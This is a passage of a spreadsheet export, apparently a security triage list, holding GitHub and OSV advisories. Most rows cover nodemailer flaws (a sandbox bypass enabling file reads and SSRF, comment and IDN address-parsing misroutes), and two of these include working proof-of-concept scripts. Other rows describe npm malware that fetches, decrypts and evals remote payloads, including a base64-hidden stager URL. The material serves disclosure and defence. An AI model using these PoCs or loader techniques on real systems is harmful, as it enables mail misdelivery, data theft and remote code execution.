The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="S147" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-8m3c-c648-2xjj</t></is></c></row><row r="148"><c r="A148" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C148" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D148" s="5" t="inlineStr" /><c r="E148" s="5" t="inlineStr" /><c r="F148" s="5" t="inlineStr" /><c r="G148" s="5" t="inlineStr" /><c r="H148" s="5" t="inlineStr" /><c r="I148" s="5" t="inlineStr" /><c r="J148" s="5" t="inlineStr" /><c r="K148" s="5" t="inlineStr" /><c r="L148" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M148" s="5" t="inlineStr" /><c r="N148" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P148" s="5" t="inlineStr" /><c r="Q148" s="5" t="inlineStr" /><c r="R148" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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148" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="149"><c r="A149" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C149" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D149" s="5" t="inlineStr" /><c r="E149" s="5" t="inlineStr" /><c r="F149" s="5" t="inlineStr" /><c r="G149" s="5" t="inlineStr" /><c r="H149" s="5" t="inlineStr" /><c r="I149" s="5" t="inlineStr" /><c r="J149" s="5" t="inlineStr" /><c r="K149" s="5" t="inlineStr" /><c r="L149" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M149" s="5" t="inlineStr" /><c r="N149" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P149" s="5" t="inlineStr" /><c r="Q149" s="5" t="inlineStr" /><c r="R149" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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149" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="150"><c r="A150" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B150" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C150" s="5" t="inlineStr"><is><t>GHSA-cc9r-2j5m-2m83</t></is></c><c r="D150" s="5" t="inlineStr" /><c r="E150" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F150" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G150" s="5" t="inlineStr" /><c r="H150" s="5" t="inlineStr" /><c r="I150" s="5" t="inlineStr" /><c r="J150" s="5" t="inlineStr" /><c r="K150" s="5" t="inlineStr" /><c r="L150" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M150" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N150" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O150" s="5" t="inlineStr" /><c r="P150" s="5" t="inlineStr" /><c r="Q150" s="5" t="inlineStr"><is><t>CWE-20, CWE-436</t></is></c><c r="R150" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

//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'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="S150" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-cc9r-2j5m-2m83</t></is></c></row><row r="151"><c r="A151" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B151" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C151" s="5" t="inlineStr"><is><t>GHSA-cvhv-g4rq-3hmw</t></is></c><c r="D151" s="5" t="inlineStr" /><c r="E151" s="5" t="inlineStr" /><c r="F151" s="5" t="inlineStr" /><c r="G151" s="5" t="inlineStr" /><c r="H151" s="5" t="inlineStr" /><c r="I151" s="5" t="inlineStr" /><c r="J151" s="5" t="inlineStr" /><c r="K151" s="5" t="inlineStr" /><c r="L151" s="5" t="inlineStr"><is><t>nuget:Magick.NET-Q16-AnyCPU, nuget:Magick.NET-Q16-HDRI-AnyCPU, nuget:Magick.NET-Q16-HDRI-OpenMP-arm64, nuget:Magick.NET-Q16-HDRI-arm64, nuget:Magick.NET-Q16-HDRI-x64, nuget:Magick.NET-Q16-HDRI-x86</t></is></c><c r="M151" s="5" t="inlineStr"><is><t>14.15.0</t></is></c><c r="N151" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O151" s="5" t="inlineStr" /><c r="P151" s="5" t="inlineStr" /><c r="Q151" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R151" s="5" t="inlineStr"><is><t>A memory leak is possible when invalid options are passed to the cli (`magick`)</t></is></c><c r="S151" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-cvhv-g4rq-3hmw</t></is></c></row><row r="152"><c r="A152" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C152" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D152" s="5" t="inlineStr" /><c r="E152" s="5" t="inlineStr" /><c r="F152" s="5" t="inlineStr" /><c r="G152" s="5" t="inlineStr" /><c r="H152" s="5" t="inlineStr" /><c r="I152" s="5" t="inlineStr" /><c r="J152" s="5" t="inlineStr" /><c r="K152" s="5" t="inlineStr" /><c r="L152" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M152" s="5" t="inlineStr" /><c r="N152" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P152" s="5" t="inlineStr" /><c r="Q152" s="5" t="inlineStr" /><c r="R152" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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is></c><c r="S152" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="153"><c r="A153" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B153" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C153" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D153" s="5" t="inlineStr" /><c r="E153" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F153" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G153" s="5" t="inlineStr" /><c r="H153" s="5" t="inlineStr" /><c r="I153" s="5" t="inlineStr" /><c r="J153" s="5" t="inlineStr" /><c r="K153" s="5" t="inlineStr" /><c r="L153" s="5" t="inlineStr"><is><t>nuget:Microsoft.DiaSymReader.Native</t></is></c><c r="M153" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N153" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O153" s="5" t="inlineStr" /><c r="P153" s="5" t="inlineStr" /><c r="Q153" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R153" s="5" t="inlineStr"><is><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is></c><c r="S153" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="154"><c r="A154" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B154" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C154" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D154" s="5" t="inlineStr" /><c r="E154" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F154" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G154" s="5" t="inlineStr" /><c r="H154" s="5" t="inlineStr" /><c r="I154" s="5" t="inlineStr" /><c r="J154" s="5" t="inlineStr" /><c r="K154" s="5" t="inlineStr" /><c r="L154" s="5" t="inlineStr"><is><t>nuget:Microsoft.DiaSymReader.Native</t></is></c><c r="M154" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N154" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O154" s="5" t="inlineStr" /><c r="P154" s="5" t="inlineStr" /><c r="Q154" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R154" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2j8r-3c22-8565. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S154" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="155"><c r="A155" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B155" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C155" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D155" s="5" t="inlineStr" /><c r="E155" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F155" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G155" s="5" t="inlineStr" /><c r="H155" s="5" t="inlineStr" /><c r="I155" s="5" t="inlineStr" /><c r="J155" s="5" t="inlineStr" /><c r="K155" s="5" t="inlineStr" /><c r="L155" s="5" t="inlineStr"><is><t>nuget:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M155" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N155" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O155" s="5" t="inlineStr" /><c r="P155" s="5" t="inlineStr" /><c r="Q155" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="R155" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S155" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="156"><c r="A156" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B156" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C156" s="5" t="inlineStr"><is><t>GHSA-wmmp-3585-3rmp</t></is></c><c r="D156" s="5" t="inlineStr" /><c r="E156" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F156" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G156" s="5" t="inlineStr" /><c r="H156" s="5" t="inlineStr" /><c r="I156" s="5" t="inlineStr" /><c r="J156" s="5" t="inlineStr" /><c r="K156" s="5" t="inlineStr" /><c r="L156" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M156" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N156" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O156" s="5" t="inlineStr" /><c r="P156" s="5" t="inlineStr" /><c r="Q156" s="5" t="inlineStr"><is><t>CWE-20, CWE-436</t></is></c><c r="R156" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A tiny SMTP sink that prints the literal RCPT TO Nodemailer transmits:
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits             :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="S156" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-wmmp-3585-3rmp</t></is></c></row><row r="157"><c r="A157" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C157" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D157" s="5" t="inlineStr" /><c r="E157" s="5" t="inlineStr" /><c r="F157" s="5" t="inlineStr" /><c r="G157" s="5" t="inlineStr" /><c r="H157" s="5" t="inlineStr" /><c r="I157" s="5" t="inlineStr" /><c r="J157" s="5" t="inlineStr" /><c r="K157" s="5" t="inlineStr" /><c r="L157" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M157" s="5" t="inlineStr" /><c r="N157" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P157" s="5" t="inlineStr" /><c r="Q157" s="5" t="inlineStr" /><c r="R157" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
